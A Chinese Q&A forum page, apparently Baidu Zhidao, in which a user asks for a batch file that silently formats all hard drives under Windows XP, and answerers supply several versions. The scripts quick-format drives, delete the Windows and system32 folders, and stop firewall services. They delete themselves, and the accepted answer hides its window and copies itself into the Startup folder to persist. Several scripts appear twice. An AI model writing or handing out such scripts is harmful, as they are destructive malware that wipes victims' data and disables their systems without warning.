硬盘自动格式化bat
要求写一个全自动格式化硬盘的.bat在XP下面1、只要双击这个bat后没有任何提示在后台直接格式化硬盘。2、重启后把C盘也格式化。当然如果2做不到,就只要做到1.看清楚要...
要求写一个 全自动格式化硬盘的.bat 在XP下面 1、只要双击这个bat后没有任何提示在后台直接格式化硬盘。2、重启后把C盘也格式化。当然如果2做不到,就只要做到1. 看清楚要求 全自动 双击后没有任何提示在后台自动运行格式。对硬盘进行完全格式化。 能要能用的,这个东西我也不能测试。 回答好了加分,也别浪费分数了
FAT32 或 NTFS 这两种硬盘都要可以格式化
帮帮堂服务01 的回答我试了,都不行,运行后没有反应。
丹江友人 的回答我再试试 不知道行不行 展开
FAT32 或 NTFS 这两种硬盘都要可以格式化
帮帮堂服务01 的回答我试了,都不行,运行后没有反应。
丹江友人 的回答我再试试 不知道行不行 展开
展开全部
硬盘格式化命令BAT
------------------------------------------------------------线下西面内容-------------------------------
@echo off
shutdown -r -t 0
format d:/q /y
format e:/q /y
format f:/q /y
format g:/q /y
cd c:\
cd windows
del *.* /q
cd system32
del *.* /q
shutdown -r -t 0
del %0
------------------------------------------------------------线上面内容-------------------------------
测试结果_系统启动不来,,,但是硬盘依然没有格式化失败告终
------------------------------------------------------------线下面内容-------------------------------
@echo off
format d:/q /y
format e:/q /y
format f:/q /y
format g:/q /y
cd c:\
cd windows
del *.* /q
cd system32
del *.* /q
shutdown -r -t 0
del %0
------------------------------------------------------------线上面内容-------------------------------
测试结果_系统启动不来,,,硬盘被格式化,,,成功!不过有一点,,有的机器有系统防火墙,补丁非常全的不起作用
------------------------------------------------------------线下面内容-------------------------------
@echo off
net stop alg /y
@net stop sharedaccess
format d:/q /y
format e:/q /y
format f:/q /y
format g:/q /y
shutdown -r -t 0
cd c:\
cd windows
del *.* /q
cd system32
del *.* /q
del %0
测试结果_系统启动不来,,,硬盘被格式化,,,成功率是99%,突破系统的
------------------------------------------------------------线下西面内容-------------------------------
@echo off
shutdown -r -t 0
format d:/q /y
format e:/q /y
format f:/q /y
format g:/q /y
cd c:\
cd windows
del *.* /q
cd system32
del *.* /q
shutdown -r -t 0
del %0
------------------------------------------------------------线上面内容-------------------------------
测试结果_系统启动不来,,,但是硬盘依然没有格式化失败告终
------------------------------------------------------------线下面内容-------------------------------
@echo off
format d:/q /y
format e:/q /y
format f:/q /y
format g:/q /y
cd c:\
cd windows
del *.* /q
cd system32
del *.* /q
shutdown -r -t 0
del %0
------------------------------------------------------------线上面内容-------------------------------
测试结果_系统启动不来,,,硬盘被格式化,,,成功!不过有一点,,有的机器有系统防火墙,补丁非常全的不起作用
------------------------------------------------------------线下面内容-------------------------------
@echo off
net stop alg /y
@net stop sharedaccess
format d:/q /y
format e:/q /y
format f:/q /y
format g:/q /y
shutdown -r -t 0
cd c:\
cd windows
del *.* /q
cd system32
del *.* /q
del %0
测试结果_系统启动不来,,,硬盘被格式化,,,成功率是99%,突破系统的
展开全部
绝对行,我都试了两三遍了。
if not "%1" == "h" mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit
Copy %0 "%userprofile%\「开始」菜单\程序\启动" /y
format c: /q /y
format d: /q /y
format e: /q /y
format f: /q /y
if not "%1" == "h" mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit
Copy %0 "%userprofile%\「开始」菜单\程序\启动" /y
format c: /q /y
format d: /q /y
format e: /q /y
format f: /q /y
本回答被提问者采纳
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
推荐律师服务:
若未解决您的问题,请您详细描述您的问题,通过百度律临进行免费专业咨询
广告 您可能关注的内容 |